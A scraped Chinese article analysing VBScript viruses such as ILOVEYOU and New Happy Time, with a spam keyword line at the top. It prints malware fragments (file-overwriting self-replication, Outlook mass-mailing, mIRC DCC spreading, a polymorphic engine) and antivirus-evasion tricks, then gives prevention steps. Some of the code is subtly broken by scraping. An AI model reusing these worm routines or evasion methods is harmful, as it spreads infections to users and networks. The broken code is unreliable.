少妇精品久久久久久久久久,国产淫片av片久久久久久

VBS腳本病毒原理分析與防范

網(wǎng)絡(luò)的流行，讓我們的世界變得更加美好，但它也有讓人不愉快的時(shí)候。當(dāng)您收到一封主題為“I Love You”的郵件，用興奮得幾乎快發(fā)抖的鼠標(biāo)去點(diǎn)擊附件的時(shí)候；當(dāng)您瀏覽一個(gè)信任的網(wǎng)站之后，發(fā)現(xiàn)打開(kāi)每個(gè)文件夾的速度非常慢的時(shí)候，您是否察覺(jué)病毒已經(jīng)闖進(jìn)了您的世界呢？2000年5月4日歐美爆發(fā)的“愛(ài)蟲(chóng)”網(wǎng)絡(luò)蠕蟲(chóng)病毒。由于通過(guò)電子郵件系統(tǒng)傳播，愛(ài)蟲(chóng)病毒在短短幾天內(nèi)狂襲全球數(shù)百萬(wàn)計(jì)的電腦。微軟、Intel等在內(nèi)的眾多大型企業(yè)網(wǎng)絡(luò)系統(tǒng)癱瘓，全球經(jīng)濟(jì)損失達(dá)幾十億美元。而去年爆發(fā)的新歡樂(lè)時(shí)光病毒至今都讓廣大電腦用戶更是苦不堪言。
    上面提及的兩個(gè)病毒最大的一個(gè)共同特點(diǎn)是：使用VBScript編寫(xiě)。以愛(ài)蟲(chóng)和新歡樂(lè)時(shí)光病毒為典型代表的VBS腳本病毒十分的猖獗，很重要的一個(gè)原因就是其編寫(xiě)簡(jiǎn)單。下面我們就來(lái)逐一對(duì)VBS腳本病毒的各個(gè)方面加以分析：

一、Vbs腳本病毒的特點(diǎn)及發(fā)展現(xiàn)狀
    VBS病毒是用VB Script編寫(xiě)而成，該腳本語(yǔ)言功能非常強(qiáng)大，它們利用Windows系統(tǒng)的開(kāi)放性特點(diǎn)，通過(guò)調(diào)用一些現(xiàn)成的Windows對(duì)象、組件，可以直接對(duì)文件系統(tǒng)、注冊(cè)表等進(jìn)行控制，功能非常強(qiáng)大。應(yīng)該說(shuō)病毒就是一種思想，但是這種思想在用VBS實(shí)現(xiàn)時(shí)變得極其容易。VBS腳本病毒具有如下幾個(gè)特點(diǎn)：
1．編寫(xiě)簡(jiǎn)單，一個(gè)以前對(duì)病毒一無(wú)所知的病毒愛(ài)好者可以在很短的時(shí)間里編出一個(gè)新型病毒來(lái)。
2．破壞力大。其破壞力不僅表現(xiàn)在對(duì)用戶系統(tǒng)文件及性能的破壞。他還可以使郵件服務(wù)器崩潰，網(wǎng)絡(luò)發(fā)生嚴(yán)重阻塞。
3．感染力強(qiáng)。由于腳本是直接解釋執(zhí)行，并且它不需要像PE病毒那樣，需要做復(fù)雜的PE文件格式處理，因此這類(lèi)病毒可以直接通過(guò)自我復(fù)制的方式感染其他同類(lèi)文件，并且自我的異常處理變得非常容易。
4．傳播范圍大。這類(lèi)病毒通過(guò)htm文檔，Email附件或其它方式，可以在很短時(shí)間內(nèi)傳遍世界各地。
5．病毒源碼容易被獲取，變種多。由于VBS病毒解釋執(zhí)行，其源代碼可讀性非常強(qiáng)，即使病毒源碼經(jīng)過(guò)加密處理后，其源代碼的獲取還是比較簡(jiǎn)單。因此，這類(lèi)病毒變種比較多，稍微改變一下病毒的結(jié)構(gòu)，或者修改一下特征值，很多殺毒軟件可能就無(wú)能為力。
6．欺騙性強(qiáng)。腳本病毒為了得到運(yùn)行機(jī)會(huì)，往往會(huì)采用各種讓用戶不大注意的手段，譬如，郵件的附件名采用雙后綴，如.jpg.vbs，由于系統(tǒng)默認(rèn)不顯示后綴，這樣，用戶看到這個(gè)文件的時(shí)候，就會(huì)認(rèn)為它是一個(gè)jpg圖片文件。
7．使得病毒生產(chǎn)機(jī)實(shí)現(xiàn)起來(lái)非常容易。所謂病毒生產(chǎn)機(jī)，就是可以按照用戶的意愿，生產(chǎn)病毒的機(jī)器（當(dāng)然，這里指的是程序），目前的病毒生產(chǎn)機(jī)，之所以大多數(shù)都為腳本病毒生產(chǎn)機(jī)，其中最重要的一點(diǎn)還是因?yàn)槟_本是解釋執(zhí)行的，實(shí)現(xiàn)起來(lái)非常容易，具體將在我們后面談及。
正因?yàn)橐陨蠋讉€(gè)特點(diǎn)，腳本病毒發(fā)展異常迅猛，特別是病毒生產(chǎn)機(jī)的出現(xiàn)，使得生成新型腳本病毒變得非常容易。

二、Vbs腳本病毒原理分析
1．vbs腳本病毒如何感染、搜索文件
    VBS腳本病毒一般是直接通過(guò)自我復(fù)制來(lái)感染文件的，病毒中的絕大部分代碼都可以直接附加在其他同類(lèi)程序的中間，譬如新歡樂(lè)時(shí)光病毒可以將自己的代碼附加在.htm文件的尾部，并在頂部加入一條調(diào)用病毒代碼的語(yǔ)句，而愛(ài)蟲(chóng)病毒則是直接生成一個(gè)文件的副本，將病毒代碼拷入其中，并以原文件名作為病毒文件名的前綴，vbs作為后綴。下面我們通過(guò)愛(ài)蟲(chóng)病毒的部分代碼具體分析一下這類(lèi)病毒的感染和搜索原理：
以下是文件感染的部分關(guān)鍵代碼：
Set fso=createobject("scripting.filesystemobject")  '創(chuàng)建一個(gè)文件系統(tǒng)對(duì)象
set self=fso.opentextfile(wscript.scriptfullname,1) '讀打開(kāi)當(dāng)前文件（即病毒本身）
vbscopy=self.readall          ' 讀取病毒全部代碼到字符串變量vbscopy……
set ap=fso.opentextfile(目標(biāo)文件.path,2,true) ' 寫(xiě)打開(kāi)目標(biāo)文件，準(zhǔn)備寫(xiě)入病毒代碼
ap.write vbscopy                               ' 將病毒代碼覆蓋目標(biāo)文件
ap.close
set cop=fso.getfile(目標(biāo)文件.path)   '得到目標(biāo)文件路徑
cop.copy(目標(biāo)文件.path  ".vbs")          ' 創(chuàng)建另外一個(gè)病毒文件（以.vbs為后綴）
目標(biāo)文件.delete(true)                            '刪除目標(biāo)文件
    上面描述了病毒文件是如何感染正常文件的：首先將病毒自身代碼賦給字符串變量vbscopy，然后將這個(gè)字符串覆蓋寫(xiě)到目標(biāo)文件，并創(chuàng)建一個(gè)以目標(biāo)文件名為文件名前綴、vbs為后綴的文件副本，最后刪除目標(biāo)文件。
下面我們具體分析一下文件搜索代碼：
'該函數(shù)主要用來(lái)尋找滿足條件的文件，并生成對(duì)應(yīng)文件的一個(gè)病毒副本
sub scan(folder_)    'scan函數(shù)定義，
on error resume next                 '如果出現(xiàn)錯(cuò)誤，直接跳過(guò)，防止彈出錯(cuò)誤窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files               ' 當(dāng)前目錄的所有文件集合
for each file in filesext=fso.GetExtensionName(file)                 '獲取文件后綴
  ext=lcase(ext)                  '后綴名轉(zhuǎn)換成小寫(xiě)字母
  if ext="mp5" then        '如果后綴名是mp5，則進(jìn)行感染。請(qǐng)自己建立相應(yīng)后綴名的文件，最好是非正常后綴名，以免破壞正常程序。
    Wscript.echo (file)
  end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders    '搜索其他目錄；遞歸調(diào)用
  scan( )
  scan(subfolder)
next
end sub
    上面的代碼就是VBS腳本病毒進(jìn)行文件搜索的代碼分析。搜索部分scan( )函數(shù)做得比較短小精悍，非常巧妙，采用了一個(gè)遞歸的算法遍歷整個(gè)分區(qū)的目錄和文件。

2．vbs腳本病毒通過(guò)網(wǎng)絡(luò)傳播的幾種方式及代碼分析
    VBS腳本病毒之所以傳播范圍廣，主要依賴于它的網(wǎng)絡(luò)傳播功能，一般來(lái)說(shuō)，VBS腳本病毒采用如下幾種方式進(jìn)行傳播：
1）通過(guò)Email附件傳播
    這是一種用的非常普遍的傳播方式，病毒可以通過(guò)各種方法拿到合法的Email地址，最常見(jiàn)的就是直接取outlook地址簿中的郵件地址，也可以通過(guò)程序在用戶文檔（譬如htm文件）中搜索Email地址。
下面我們具體分析一下VBS腳本病毒是如何做到這一點(diǎn)的：
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //創(chuàng)建一個(gè)OUTLOOK應(yīng)用的對(duì)象
If outlookApp= "Outlook" Then
  Set mapiObj=outlookApp.GetNameSpace("MAPI")   //獲取MAPI的名字空間
  Set addrList= mapiObj.AddressLists                //獲取地址表的個(gè)數(shù)
  For Each addr In addrList
   If  addr.AddressEntries.Count > 0 Then
     addrEntCount = addr.AddressEntries.Count //獲取每個(gè)地址表的Email記錄數(shù)
     For addrEntIndex= 1 To addrEntCount       //遍歷地址表的Email地址
       Set item = outlookApp.CreateItem(0)      //獲取一個(gè)郵件對(duì)象實(shí)例
       Set addrEnt = addr.AddressEntries(addrEntIndex)   //獲取具體Email地址
       item.To = addrEnt.Address                     //填入收信人地址        item.Subject = "病毒傳播實(shí)驗(yàn)"    //寫(xiě)入郵件標(biāo)題
       item.Body = "這里是病毒郵件傳播測(cè)試，收到此信請(qǐng)不要慌張！"  //寫(xiě)入文件內(nèi)容
       Set attachMents=item.Attachments   //定義郵件附件
       attachMents.Add fileSysObj.GetSpecialFolder(0)  "\test.jpg.vbs"
       item.DeleteAfterSubmit = True      //信件提交后自動(dòng)刪除
       If item.To > "" Then
        item.Send                     //發(fā)送郵件
        shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒標(biāo)記，以免重復(fù)感染
       End If
     Next
   End If
  Next
End if
End Function

2）通過(guò)局域網(wǎng)共享傳播
    局域網(wǎng)共享傳播也是一種非常普遍并且有效的網(wǎng)絡(luò)傳播方式。一般來(lái)說(shuō)，為了局域網(wǎng)內(nèi)交流方便，一定存在不少共享目錄，并且具有可寫(xiě)權(quán)限，譬如win2000創(chuàng)建共享時(shí)，默認(rèn)就是具有可寫(xiě)權(quán)限。這樣病毒通過(guò)搜索這些共享目錄，就可以將病毒代碼傳播到這些目錄之中。
    在VBS中，有一個(gè)對(duì)象可以實(shí)現(xiàn)網(wǎng)上鄰居共享文件夾的搜索與文件操作。我們利用該對(duì)象就可以達(dá)到傳播的目的。
welcome_msg = "網(wǎng)絡(luò)連接搜索測(cè)試"
Set WSHNetwork = WScript.CreateObject("WScript.Network") '創(chuàng)建一個(gè)網(wǎng)絡(luò)對(duì)象
Set oPrinters = WshNetwork.EnumPrinterConnections   '創(chuàng)建一個(gè)網(wǎng)絡(luò)打印機(jī)連接列表
WScript.Echo "Network printer mappings:"
For i = 0 to oPrinters.Count - 1 Step 2     '顯示網(wǎng)絡(luò)打印機(jī)連接情況
  WScript.Echo "Port "  oPrinters.Item(i)  " = "  oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives   '創(chuàng)建一個(gè)網(wǎng)絡(luò)共享連接列表
If colDrives.Count = 0 Then
  MsgBox "沒(méi)有可列出的驅(qū)動(dòng)器。", vbInformation + vbOkOnly,welcome_msg
Else
  strMsg = "當(dāng)前網(wǎng)絡(luò)驅(qū)動(dòng)器連接: "  CRLF
  For i = 0 To colDrives.Count - 1 Step 2
   strMsg = strMsg  Chr(13)  Chr(10)  colDrives(i)  Chr(9)  colDrives(i + 1)
  Next
  MsgBox strMsg, vbInformation + vbOkOnly, welcome_msg'顯示當(dāng)前網(wǎng)絡(luò)驅(qū)動(dòng)器連接
End If
    上面是一個(gè)用來(lái)尋找當(dāng)前打印機(jī)連接和網(wǎng)絡(luò)共享連接并將它們顯示出來(lái)的完整腳本程序。在知道了共享連接之后，我們就可以直接向目標(biāo)驅(qū)動(dòng)器讀寫(xiě)文件了。

3）通過(guò)感染htm、asp、jsp、php等網(wǎng)頁(yè)文件傳播
    如今，WWW服務(wù)已經(jīng)變得非常普遍，病毒通過(guò)感染htm等文件，勢(shì)必會(huì)導(dǎo)致所有訪問(wèn)過(guò)該網(wǎng)頁(yè)的用戶機(jī)器感染病毒。
病毒之所以能夠在htm文件中發(fā)揮強(qiáng)大功能，采用了和絕大部分網(wǎng)頁(yè)惡意代碼相同的原理。基本上，它們采用了相同的代碼，不過(guò)也可以采用其它代碼，這段代碼是病毒FSO,WSH等對(duì)象能夠在網(wǎng)頁(yè)中運(yùn)行的關(guān)鍵。在注冊(cè)表HKEY_CLASSES_ROOT\CLSID\下我們可以找到這么一個(gè)主鍵{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}，注冊(cè)表中對(duì)它他的說(shuō)明是“Windows Script Host Shell Object”，同樣，我們也可以找到{0D43FE01-F093-11CF-8940-00A0C9054228}，注冊(cè)表對(duì)它的說(shuō)明是“FileSystem Object”，一般先要對(duì)COM進(jìn)行初始化，在獲取相應(yīng)的組件對(duì)象之后，病毒便可正確地使用FSO、WSH兩個(gè)對(duì)象，調(diào)用它們的強(qiáng)大功能。代碼如下所示：
Set Apple0bject = document.applets("KJ_guest")
Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Apple0bject.createInstance()             '創(chuàng)建一個(gè)實(shí)例
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
Apple0bject.createInstance()             '創(chuàng)建一個(gè)實(shí)例
Set FSO = Apple0bject.Get0bject()
對(duì)于其他類(lèi)型文件，這里不再一一分析。

4）通過(guò)IRC聊天通道傳播
    病毒通過(guò)IRC傳播一般來(lái)說(shuō)采用以下代碼（以MIRC為例）
Dim mirc
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\mirc\script.ini")   '創(chuàng)建文件script.ini
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True '將病毒文件備份到attachment.vbs
mirc.WriteLine "[script]"
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }"
        '利用命令/ddc send $nick attachment.vbs給通道中的其他用戶傳送病毒文件
mirc.Close
    以上代碼用來(lái)往Script.ini文件中寫(xiě)入一行代碼，實(shí)際中還會(huì)寫(xiě)入很多其他代碼。Script.ini中存放著用來(lái)控制IRC會(huì)話的命令，這個(gè)文件里面的命令是可以自動(dòng)執(zhí)行的。譬如，“歌蟲(chóng)”病毒TUNE.VBS就會(huì)修改c:\mirc\script.ini 和 c:\mirc\mirc.ini，使每當(dāng)IRC用戶使用被感染的通道時(shí)都會(huì)收到一份經(jīng)由DDC發(fā)送的TUNE.VBS。同樣，如果Pirch98已安裝在目標(biāo)計(jì)算機(jī)的c:\pirch98目錄下，病毒就會(huì)修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini，使每當(dāng)IRC用戶使用被感染的通道時(shí)都會(huì)收到一份經(jīng)由DDC發(fā)送的TUNE.VBS。
    另外病毒也可以通過(guò)現(xiàn)在廣泛流行的KaZaA進(jìn)行傳播。病毒將病毒文件拷貝到KaZaA的默認(rèn)共享目錄中，這樣，當(dāng)其他用戶訪問(wèn)這臺(tái)機(jī)器時(shí)，就有可能下載該病毒文件并執(zhí)行。這種傳播方法可能會(huì)隨著KaZaA這種點(diǎn)對(duì)點(diǎn)共享工具的流行而發(fā)生作用。
還有一些其他的傳播方法，我們這里不再一一列舉。

3．VBS腳本病毒如何獲得控制權(quán)
    如何獲取控制權(quán)？這一個(gè)是一個(gè)比較有趣的話題，而VBS腳本病毒似乎將這個(gè)話題發(fā)揮的淋漓盡致。筆者在這里列出幾種典型的方法：
1）修改注冊(cè)表項(xiàng)
    windows在啟動(dòng)的時(shí)候，會(huì)自動(dòng)加載HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run項(xiàng)下的各鍵值所執(zhí)向的程序。腳本病毒可以在此項(xiàng)下加入一個(gè)鍵值指向病毒程序，這樣就可以保證每次機(jī)器啟動(dòng)的時(shí)候拿到控制權(quán)。vbs修改貯冊(cè)表的方法比較簡(jiǎn)單，直接調(diào)用下面語(yǔ)句即可。
wsh.RegWrite(strName, anyvalue [,strType])
2）通過(guò)映射文件執(zhí)行方式
    譬如，我們新歡樂(lè)時(shí)光將dll的執(zhí)行方式修改為wscript.exe。甚至可以將exe文件的映射指向病毒代碼。
3）欺騙用戶，讓用戶自己執(zhí)行
    這種方式其實(shí)和用戶的心理有關(guān)。譬如，病毒在發(fā)送附件時(shí)，采用雙后綴的文件名，由于默認(rèn)情況下，后綴并不顯示，舉個(gè)例子，文件名為beauty.jpg.vbs的vbs程序顯示為beauty.jpg，這時(shí)用戶往往會(huì)把它當(dāng)成一張圖片去點(diǎn)擊。同樣，對(duì)于用戶自己磁盤(pán)中的文件，病毒在感染它們的時(shí)候，將原有文件的文件名作為前綴，vbs作為后綴產(chǎn)生一個(gè)病毒文件，并刪除原來(lái)文件，這樣，用戶就有可能將這個(gè)vbs文件看作自己原來(lái)的文件運(yùn)行。
4）desktop.ini和folder.htt互相配合
    這兩個(gè)文件可以用來(lái)配置活動(dòng)桌面，也可以用來(lái)自定義文件夾。如果用戶的目錄中含有這兩個(gè)文件，當(dāng)用戶進(jìn)入該目錄時(shí)，就會(huì)觸發(fā)folder.htt中的病毒代碼。這是新歡樂(lè)時(shí)光病毒采用的一種比較有效的獲取控制權(quán)的方法。并且利用folder.htt，還可能觸發(fā)exe文件，這也可能成為病毒得到控制權(quán)的一種有效方法！
    病毒獲得控制權(quán)的方法還有很多，這方面作者發(fā)揮的余地也比較大。

4．vbs腳本病毒對(duì)抗反病毒軟件的幾種技巧
    病毒要生存，對(duì)抗反病毒軟件的能力也是必需的。一般來(lái)說(shuō)，VBS腳本病毒采用如下幾種對(duì)抗反病毒軟件的方法：
1）自加密
譬如，新歡樂(lè)時(shí)光病毒，它可以隨機(jī)選取密鑰對(duì)自己的部分代碼進(jìn)行加密變換，使得每次感染的病毒代碼都不一樣，達(dá)到了多態(tài)的效果。這給傳統(tǒng)的特征值查毒法帶來(lái)了一些困難。病毒也還可以進(jìn)一步的采用變形技術(shù)，使得每次感染后的加密病毒的解密后的代碼都不一樣。
下面看一個(gè)簡(jiǎn)單的vbs腳本變形引擎(來(lái)自flyshadow)
Randomize
Set Of = CreateObject("Scripting.FileSystemObject")    '創(chuàng)建文件系統(tǒng)對(duì)象
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall    '讀取自身代碼
fS = Array("Of", "vC", "fS", "fSC")   '定義一個(gè)即將被替換字符的數(shù)組
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))  Chr((Int(Rnd * 22) + 65))  Chr((Int(Rnd * 22) + 65))  Chr((Int(Rnd * 22) + 65)))  '取4個(gè)隨機(jī)字符替換數(shù)組fS中的字符串
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC  '將替換后的代碼寫(xiě)回文件
    上面這段代碼使得該VBS文件在每次運(yùn)行后，其Of，vC，fS，fSC四字符串都會(huì)用隨機(jī)字符串來(lái)代替，這在很大程度上可以防止反病毒軟件用特征值查毒法將其查出。
2）巧妙運(yùn)用Execute函數(shù)
    用過(guò)VBS程序的朋友是否會(huì)覺(jué)得奇怪：當(dāng)一個(gè)正常程序中用到了FileSystemObject對(duì)象的時(shí)候，有些反病毒軟件會(huì)在對(duì)這個(gè)程序進(jìn)行掃描的時(shí)候報(bào)告說(shuō)此Vbs文件的風(fēng)險(xiǎn)為高，但是有些VBS腳本病毒同樣采用了FileSystemObject對(duì)象，為什么卻又沒(méi)有任何警告呢？原因很簡(jiǎn)單，就是因?yàn)檫@些病毒巧妙的運(yùn)用了Execute方法。有些殺毒軟件檢測(cè)VBS病毒時(shí)，會(huì)檢查程序中是否聲明使用了FileSystemObject對(duì)象，如果采用了，這會(huì)發(fā)出報(bào)警。如果病毒將這段聲明代碼轉(zhuǎn)化為字符串，然后通過(guò)Execute(String)函數(shù)執(zhí)行，就可以躲避某些反病毒軟件。
3）改變某些對(duì)象的聲明方法
    譬如fso=createobject("scripting.filesystemobject")，我們將其改變?yōu)?
fso=createobject("script"＋"ing.filesyste"＋"mobject")，這樣反病毒軟件對(duì)其進(jìn)行靜態(tài)掃描時(shí)就不會(huì)發(fā)現(xiàn)filesystemobject對(duì)象。
4）直接關(guān)閉反病毒軟件
    VBS腳本功能強(qiáng)大，它可以直接在搜索用戶進(jìn)程然后對(duì)進(jìn)程名進(jìn)行比較，如果發(fā)現(xiàn)是反病毒軟件的進(jìn)程就直接關(guān)閉，并對(duì)它的某些關(guān)鍵程序進(jìn)行刪除。

5．Vbs病毒生產(chǎn)機(jī)的原理介紹
    所謂病毒生產(chǎn)機(jī)就是指可以直接根據(jù)用戶的選擇產(chǎn)生病毒源代碼的軟件。在很多人看來(lái)這或許不可思議，其實(shí)對(duì)腳本病毒而言它的實(shí)現(xiàn)非常簡(jiǎn)單。
    腳本語(yǔ)言是解釋執(zhí)行的、不需要編譯，程序中不需要什么校驗(yàn)和定位，每條語(yǔ)句之間分隔得比較清楚。這樣，先將病毒功能做成很多單獨(dú)的模塊，在用戶做出病毒功能選擇后，生產(chǎn)機(jī)只需要將相應(yīng)的功能模塊拼湊起來(lái)，最后再作相應(yīng)的代碼替換和優(yōu)化即可。由于篇幅關(guān)系和其他原因，這里不作詳細(xì)介紹。

三、如何防范vbs腳本病毒
1．如何從樣本中提?。用埽┠_本病毒
    對(duì)于沒(méi)有加密的腳本病毒，我們可以直接從病毒樣本中找出來(lái)，現(xiàn)在介紹一下如何從病毒樣本中提取加密VBS腳本病毒，這里我們以新歡樂(lè)時(shí)光為例。
用JediEdit打開(kāi)folder.htt。我們發(fā)現(xiàn)這個(gè)文件總共才93行，第一行BODY onload="vbscript:KJ_start()">，幾行注釋后，以html>開(kāi)始，/html>節(jié)尾。相信每個(gè)人都知道這是個(gè)什么類(lèi)型的文件吧！
    第87行到91行，是如下語(yǔ)句：
87：script language=vbscript>
88：ExeString = "Afi FkSeboa)EqiiQbtq)S^pQbtq)AadobaPfdj)>mlibL^gb`p)CPK...；后面省略，很長(zhǎng)！
89：Execute("Dim KeyArr(3),ThisText"vbCrLf"KeyArr(0) = 3"vbCrLf"KeyArr(1) = 3"vbCrLf"KeyArr(2) = 3"vbCrLf"KeyArr(3) = 4"vbCrLf"For i=1 To Len(ExeString)"vbCrLf"TempNum = Asc(Mid(ExeString,i,1))"vbCrLf"If TempNum = 18 Then"vbCrLf"TempNum = 34"vbCrLf"End If"vbCrLf"TempChar = Chr(TempNum + KeyArr(i Mod 4))"vbCrLf"If TempChar = Chr(28) Then"vbCrLf"TempChar = vbCr"vbCrLf"ElseIf TempChar = Chr(29) Then"vbCrLf"TempChar = vbLf"vbCrLf"End If"vbCrLf"ThisText = ThisText  TempChar"vbCrLf"Next") 90：Execute(ThisText) 91：/script>
    第87和91行不用解釋了，第88行是一個(gè)字符串的賦值，很明顯這是被加密過(guò)的病毒代碼。看看89行最后的一段代碼ThisText = ThisText  TempChar，再加上下面那一行，我們肯定能夠猜到ThisText里面放的是病毒解密代碼（熟悉vbs的兄弟當(dāng)然也可以分析一下這段解密代碼，too simple!就算完全不看代碼也應(yīng)該可以看得出來(lái)的)。第90行是執(zhí)行剛才ThisText中的那段代碼（經(jīng)過(guò)解密處理后的代碼）。
那么，下一步該怎么做呢？很簡(jiǎn)單，我們只要在病毒代碼解密之后，將ThisText的內(nèi)容輸出到一個(gè)文本文件就可以解決了。由于上面幾行是vbscript,于是我創(chuàng)建了如下一個(gè).txt文件：
    首先，copy第88、89兩行到剛才建立的.txt文件，當(dāng)然如果你愿意看看新歡樂(lè)時(shí)光的執(zhí)行效果，你也可以在最后輸入第90行。然后在下面一行輸入創(chuàng)建文件和將ThisText寫(xiě)入文件vbs代碼，整個(gè)文件如下所示：
ExeString = "Afi...  ' 第88行代碼 Execute("Dim KeyAr... ' 第89行代碼
set fso=createobject("scripting.filesystemobject") ' 創(chuàng)建一個(gè)文件系統(tǒng)對(duì)象
set virusfile=fso.createtextfile("resource.log",true) ' 創(chuàng)建一個(gè)新文件resource.log，用以存放解密后的病毒代碼 virusfile.writeline(ThisText)  ' 將解密后的代碼寫(xiě)入resource.log
    OK！就這么簡(jiǎn)單，保存文件，將該文件后綴名.txt改為.vbs(.vbe也可以)，雙擊，你會(huì)發(fā)現(xiàn)該文件目錄下多了一個(gè)文件resource.log，打開(kāi)這個(gè)文件，怎么樣？是不是“新歡樂(lè)時(shí)光”的源代碼??！

2．vbs腳本病毒的弱點(diǎn)
    vbs腳本病毒由于其編寫(xiě)語(yǔ)言為腳本，因而它不會(huì)像PE文件那樣方便靈活，它的運(yùn)行是需要條件的（不過(guò)這種條件默認(rèn)情況下就具備了）。筆者認(rèn)為，VBS腳本病毒具有如下弱點(diǎn)：
1）絕大部分VBS腳本病毒運(yùn)行的時(shí)候需要用到一個(gè)對(duì)象：FileSystemObject
2）VBScript代碼是通過(guò)Windows Script Host來(lái)解釋執(zhí)行的。
3）VBS腳本病毒的運(yùn)行需要其關(guān)聯(lián)程序Wscript.exe的支持。
4）通過(guò)網(wǎng)頁(yè)傳播的病毒需要ActiveX的支持
5）通過(guò)Email傳播的病毒需要OE的自動(dòng)發(fā)送郵件功能支持，但是絕大部分病毒都是以Email為主要傳播方式的。

3．如何預(yù)防和解除vbs腳本病毒
    針對(duì)以上提到的VBS腳本病毒的弱點(diǎn)，筆者提出如下集中防范措施：
1）禁用文件系統(tǒng)對(duì)象FileSystemObject
方法：用regsvr32 scrrun.dll /u這條命令就可以禁止文件系統(tǒng)對(duì)象。其中regsvr32是Windows\System下的可執(zhí)行文件?；蛘咧苯硬檎襰crrun.dll文件刪除或者改名。
還有一種方法就是在注冊(cè)表中HKEY_CLASSES_ROOT\CLSID\下找到一個(gè)主鍵{0D43FE01-F093-11CF-8940-00A0C9054228}的項(xiàng)，咔嚓即可。
2）卸載Windows Scripting Host
在Windows 98中（NT 4.0以上同理），打開(kāi)［控制面板］→［添加/刪除程序］→［Windows安裝程序］→［附件］，取消“Windows Scripting Host”一項(xiàng)。
和上面的方法一樣，在注冊(cè)表中HKEY_CLASSES_ROOT\CLSID\下找到一個(gè)主鍵{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的項(xiàng)，咔嚓。
3）刪除VBS、VBE、JS、JSE文件后綴名與應(yīng)用程序的映射
點(diǎn)擊［我的電腦］→［查看］→［文件夾選項(xiàng)］→［文件類(lèi)型］，然后刪除VBS、VBE、JS、JSE文件后綴名與應(yīng)用程序的映射。
4）在Windows目錄中，找到WScript.exe，更改名稱或者刪除，如果你覺(jué)得以后有機(jī)會(huì)用到的話，最好更改名稱好了，當(dāng)然以后也可以重新裝上。
5）要徹底防治VBS網(wǎng)絡(luò)蠕蟲(chóng)病毒，還需設(shè)置一下你的瀏覽器。我們首先打開(kāi)瀏覽器，單擊菜單欄里“Internet 選項(xiàng)”安全選項(xiàng)卡里的［自定義級(jí)別］按鈕。把“ActiveX控件及插件”的一切設(shè)為禁用，這樣就不怕了。呵呵，譬如新歡樂(lè)時(shí)光的那個(gè)ActiveX組件如果不能運(yùn)行，網(wǎng)絡(luò)傳播這項(xiàng)功能就玩完了。
6）禁止OE的自動(dòng)收發(fā)郵件功能
7）由于蠕蟲(chóng)病毒大多利用文件擴(kuò)展名作文章，所以要防范它就不要隱藏系統(tǒng)中已知文件類(lèi)型的擴(kuò)展名。Windows默認(rèn)的是“隱藏已知文件類(lèi)型的擴(kuò)展名稱”，將其修改為顯示所有文件類(lèi)型的擴(kuò)展名稱。
8）將系統(tǒng)的網(wǎng)絡(luò)連接的安全級(jí)別設(shè)置至少為“中等”，它可以在一定程度上預(yù)防某些有害的Java程序或者某些ActiveX組件對(duì)計(jì)算機(jī)的侵害。
9）呵呵，最后一項(xiàng)不說(shuō)大家也應(yīng)該知道了，殺毒軟件確實(shí)很必要，盡管有些殺毒軟件挺讓廣大用戶失望，不過(guò)，選擇是雙方的哦。在這個(gè)病毒橫飛的網(wǎng)絡(luò)，如果您的機(jī)器沒(méi)有裝上殺毒軟件我覺(jué)得確實(shí)挺不可思議的。

四、對(duì)所有腳本類(lèi)病毒發(fā)展的展望
    隨著網(wǎng)絡(luò)的飛速發(fā)展，網(wǎng)絡(luò)蠕蟲(chóng)病毒開(kāi)始流行，而VBS腳本蠕蟲(chóng)則更加突出，不僅數(shù)量多，而且威力大。由于利用腳本編寫(xiě)病毒比較簡(jiǎn)單，除了將繼續(xù)流行目前的VBS腳本病毒外，將會(huì)逐漸出現(xiàn)更多的其它腳本類(lèi)病毒，譬如PHP，JS，Perl病毒等。
    但是腳本并不是真正病毒技術(shù)愛(ài)好者編寫(xiě)病毒的最佳工具，并且腳本病毒解除起來(lái)比較容易、相對(duì)容易防范。筆者認(rèn)為，腳本病毒仍將繼續(xù)流行，但是能夠具有像愛(ài)蟲(chóng)、新歡樂(lè)時(shí)光那樣大影響的腳本蠕蟲(chóng)病毒只是少數(shù)。

您可能感興趣的文章:

VBS.Runauto腳本病毒分析篇
vbs病毒制作之一復(fù)制自身的vbs腳本
Trojan.DL.VBS.Agent.cpb(k[1].js)腳本病毒的解決方法
vbs腳本病毒生成器下載
對(duì)一個(gè)vbs腳本病毒的病毒原理分析

標(biāo)簽：內(nèi)蒙古南京張掖達(dá)州鶴壁丹東資質(zhì)掛靠柳州

巨人網(wǎng)絡(luò)通訊聲明：本文標(biāo)題《VBS腳本病毒原理分析與防范》，本文關(guān)鍵詞 VBS,腳本,病毒,原理,分析,；如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題，煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們，我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò)，涉及言論、版權(quán)與本站無(wú)關(guān)。